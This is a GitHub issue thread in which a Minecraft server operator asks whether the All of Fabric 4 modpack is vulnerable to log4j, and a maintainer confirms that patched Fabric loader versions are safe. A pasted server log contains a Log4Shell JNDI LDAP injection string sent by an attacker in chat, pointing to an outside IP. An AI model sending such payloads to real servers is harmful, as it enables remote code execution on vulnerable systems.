Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

log4j? #158

Open
cocus opened this issue Jan 15, 2022 · 3 comments
Open

log4j? #158

cocus opened this issue Jan 15, 2022 · 3 comments

Comments

@cocus
Copy link

cocus commented Jan 15, 2022

Hi!
I've been bombarded with some users (namely FermatSleep, which seems to be "rafael") on my Windows 10 server.
I didn't see anything unusual except for:

[10:00:07] [Server thread/INFO]: FermatSleep[/195.154.52.77:56322] logged in with entity id 15317 at (-0.5, 72.0, 972.5)
[10:00:07] [Server thread/WARN]: Player class_3222['FermatSleep'/15317, l='ServerLevel[world]', x=-0.50, y=72.00, z=972.50] could not be synced because server networking isn't set up yet.
[10:00:07] [Server thread/INFO]: FermatSleep joined the game
[10:00:09] [Server thread/INFO]: <FermatSleep> ${jndi:ldap://195.154.52.77:1389/a}
[10:00:09] [Server thread/INFO]: FermatSleep lost connection: Disconnected
[10:00:09] [Server thread/INFO]: FermatSleep left the game

But all the other users on reddit are reporting the same thing and the same IPs. By the looks of it, the **shole only targeted Linux servers...
The thing is, is AOF4 affected? or any of the fabric server jars or anything? I didn't see any log4j jars but that doesn't mean there's none.
I tried the ldap log4js tests by commenting on my own account while connected to the server, but... Nothing showed up. Not even if I ran ldapsearch on those urls provided by some tools. So I wanted to know more.
Do I need to take some measures? (I've already blocked his IP address tho!)
Thanks

@haykam821
Copy link
Collaborator

If you had Fabric loader 0.12.9 or later, you should be fine. You likely have this loader version already if you use All of Fabric 4 versions 1.1.2 or 1.1.3.

@cocus
Copy link
Author

cocus commented Jan 15, 2022

I'm using 1.1.3, and the previous version I had was 0.09 which I promptly updated on the 14th of december of 2021.

However these messages appeared yesterday and took me by surprise.
Thanks for the confirmation

@yorii
Copy link

yorii commented Feb 6, 2022

Google his name, he does this on all minecraft servers on the entire planet, it's a miracle nobody has banned his account or gotten his ISP to block him..

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

3 participants